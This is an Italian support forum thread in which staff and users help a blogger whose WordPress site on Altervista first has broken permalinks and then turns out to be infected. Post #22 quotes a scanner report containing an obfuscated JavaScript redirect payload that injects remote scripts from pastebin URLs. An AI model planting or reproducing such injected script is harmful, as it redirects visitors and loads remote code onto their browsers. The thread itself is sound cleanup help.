Visualizzazione risultati 1 fino 24 di 24

Discussione: Problema con menù e categorie

  1. #1
    Guest

    Question Problema con menù e categorie

    Buon pomeriggio.
    Oggi ho notato un problema sul mio blog "Le Follie di Talia".
    Avevo il tema "Editorial" , e ho notato che cliccando a lato, sul menù delle categorie, non venivo rimandata ad una pagina con gli articoli della categoria, ma ritornava alla home page, con tutti gli articoli, senza distinzione di categoria.
    Inoltre cliccando sul titolo di un articolo a caso, non viene visualizzato l'articolo.
    Abbiamo provato a cambiare il tema inserendo " Desk Mess Mirrored" e reimpostando il menù principale con le categorie, ma il problema persiste. come posso risolvere?

    grazie anticipatamente per l'aiuto.

  2. #2
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Se provi a disabilitare tutti i plugin il problema persiste?

  3. #3
    Guest

    Predefinito

    Grazie per il suggerimento.
    ho appena fatto ciò che mi consigli ma purtroppo il problema persiste ancora :(

  4. #4
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Per ora tieni disabilitati i plugin finché non individuiamo la causa. Prova anche ad impostare il tema Keith. Se risolve allora la colpa è del tema. Se non risolve prova a cambiare le impostazioni dei Permalink (seleziona predefinito). Riporta qua poi l'esito di tutte queste prove.

  5. #5
    Guest

    Predefinito

    Citazione Originalmente inviato da karl94 Visualizza messaggio
    Per ora tieni disabilitati i plugin finché non individuiamo la causa. Prova anche ad impostare il tema Keith. Se risolve allora la colpa è del tema. Se non risolve prova a cambiare le impostazioni dei Permalink (seleziona predefinito). Riporta qua poi l'esito di tutte queste prove.


    1) impostazione tema Keith
    ho impostato il tema Keith, e il problema persiste. Inoltre ho notato una cosa che prima non avevo verificato. Anche andando nella home del mio blog http://lefollieditalia.altervista.org/blog/ e cliccando sul titolo dei post, non mi viene aperto nessun articolo. Ogni click rimanda alla home e non cambia neanche lo slug sulla barra dell'indirizzo.

    2) permalink:
    Missione compiuta!!! grande!! Grazie mille. Ora provo ad impostare il tema normale del mio blog e a ripristinarne l'estetica.
    Ne approfitto della tua gentilezza per chiederti una informazione.
    Come mai ho avuto questo problema? ho involontariamente cambiato o toccato qualcosa?


    Grazie mille per la disponibilità e la chiarezza!

  6. #6
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Dovresti però provare ad impostare nuovamente il formato Nome articolo nei permalink, non è normale che non funzioni.

  7. #7
    Guest

    Predefinito

    Ho fatto la prova. Cambiando tema, ma lasciando il permalink come "predefinito"; tutto funziona correttamente.

    Andando a ripristinare "nome articolo", il problema si ripresenta...

  8. #8
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,744

    Predefinito

    Allora per adesso tienilo su Predefinito, effettueremo ulteriori verifiche in merito.

  9. #9
    Guest

    Predefinito




    oggi il problema è più grave da qualsiasi motore di ricerca provi ad accedere mi compare questa immagine senza accedere al sito ho provato a fare tutte le pulizie e scansioni con tutti gli antivirus e quant altro ma il problema persiste

  10. #10
    Guest

  11. #11
    Guest

    Predefinito

    Citazione Originalmente inviato da lefollieditalia Visualizza messaggio
    Ciao il mio antivirus rileva che è un virus e quindi dovresti controllare il tuo spazio ftp, una cosa simile era successa anche a me solo che io rispetto a te usavo Joomla. Mi auguro che tu possa risolverlo eliminando manualmente i file "malevoli"

  12. #12
    Guest

    Predefinito

    se non mi si dice passo passo non riuscirò mai
    ho provato antivirus su antivirus motori su motori ma niente

  13. #13
    Guest

    Predefinito

    ho provato a riportare il pc ad una data in cui tutto era quasi regolare a parte i problemi coi temi

  14. #14
    Guest

    Predefinito

    Citazione Originalmente inviato da lefollieditalia Visualizza messaggio
    ho provato a riportare il pc ad una data in cui tutto era quasi regolare a parte i problemi coi temi
    Che tipo di applicativo usi per il Blog? Wordpress?

  15. #15
    Guest

    Predefinito

    Citazione Originalmente inviato da lefollieditalia Visualizza messaggio
    ho provato a riportare il pc ad una data in cui tutto era quasi regolare a parte i problemi coi temi
    il virus non è nel computer ma nello spazio FTP

  16. #16
    Guest

    Predefinito

    si uso word press

  17. #17
    Guest

    Predefinito

    dal pannello di controllo accedo all ftp ma poi una volta li cosa devo fare?

  18. #18
    Guest

    Predefinito

    Allora per rilevare Malware nello spazio Ftp puoi usare Sicuri Site Check che effettua una scansione di tutte le cartelle e al termine del processo salva un file dove riporta tutte le cartelle e/o i file infetti , molte delle quali generalmente sono plugin e temi di WordPress navigare il blog usando vari Browser, seguendo gli errori riportati da Sicuri collegarsi al pannello di controllo di WordPress e cancellare i plugin che non usate o che sono infetti, ripetendo la stessa cosa con i temi collegarsi via FTP al blog ed effettuare il download dei singoli file infetti segnalati da Sicuri, ripulire i file,ricaricare i file in FTP e rilanciare SicuriSiteCheck per una nuova scansione. Per evitare che succeda altre volte ti consiglio di cambiare spesso la password del pannello di controllo di altervista.
    Ultima modifica di friendzona : 09-12-2015 alle ore 22.24.00 Motivo: errore

  19. #19
    Guest

    Predefinito

    grazie appena posso prova a fare quanto hai scritto
    intanto grazie mille e speriam bene

  20. #20
    Guest

    Predefinito

    grazie al sito segnalato ho rilevato l infetto come faccio però a toglierlo

  21. #21
    Guest

    Predefinito

    Citazione Originalmente inviato da lefollieditalia Visualizza messaggio
    grazie al sito segnalato ho rilevato l infetto come faccio però a toglierlo
    Per toglierlo devi entrare nello spazio ftp, cercare il file infetto, scaricare il file nel computer ed elimini il codice html infetto. Se mi scrivi qui il nome del file posso fare una ricerca e posso dirti qualcosa di piu'. Ah dimenticavo per scaricare il file infetto entri nello spazio ftp usando Filezilla, inserisci l'indirizzo ftp del tuo sito, l'username e la password.

  22. #22
    Guest

    Predefinito

    http://lefollieditalia.altervista.or...n.js?ver=1.2.1 ( View Payload )

    Known javascript malware. Details: http://kb.sucuri.net/malware/signatures/js.redirect
    document.write('>tpircs/<>"8Ss4cMMW=i?php.war/moc.nibetsap//:ptth"=crs tpircs<'.split("").reverse().join(""));document.wr ite('>tpircs/<>"yjB4HiDr=i?php.war/moc.nibetsap//:ptth"=crs tpircs<'.split("").reverse().join(""))






    Get Immediate Clean Up


    Clean Up My Site

    (Or Take Product Tour)
    Your site appears to be hacked. Hacked sites can lose nearly 95% of your traffic in as little as 24 to 48 hours if not fixed immediately – losing your organic rankings and being blocked by Google, Bing and many other blacklists. Hacked sites can also expose your customers and readers private and financial information, and turn your site into a host for dangerous malware and illicit material, creating massive liability. Secure your site now with Sucuri.













































































































    *Cached results from a few minutes ago.Force a Re-scan to clear the cache.


    Scan Another Website


    Enter a URL (ex. sucuri.net) and the Sucuri SiteCheck scanner will check the website for known malware, blacklisting status, website errors, and out-of-date software.





    Scan Website!

    Disclaimer: Sucuri SiteCheck is a free & remote scanner. Although we do our best to provide the best results, 100% accuracy is not realistic, and not guaranteed.


    Sucuri Plans



    Basic


    1 Website


    $16.66
    per month

    Includes
    Malware Cleanup (No page limit)
    DDoS / Brute force protection
    Blacklist Removal
    Security Monitoring

    questo è quello che segnala ma per procedere devo aspettare i giovani di casa grazie per la gentilezza e la disposizione

  23. #23
    Guest

    Predefinito

    Da una ricerca effettuata ho rilevato che è un malware dovuto ad una Jquery e credo che sia presente in un Plug-in utilizzato nel Template del suo sito.

  24. #24
    Guest

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •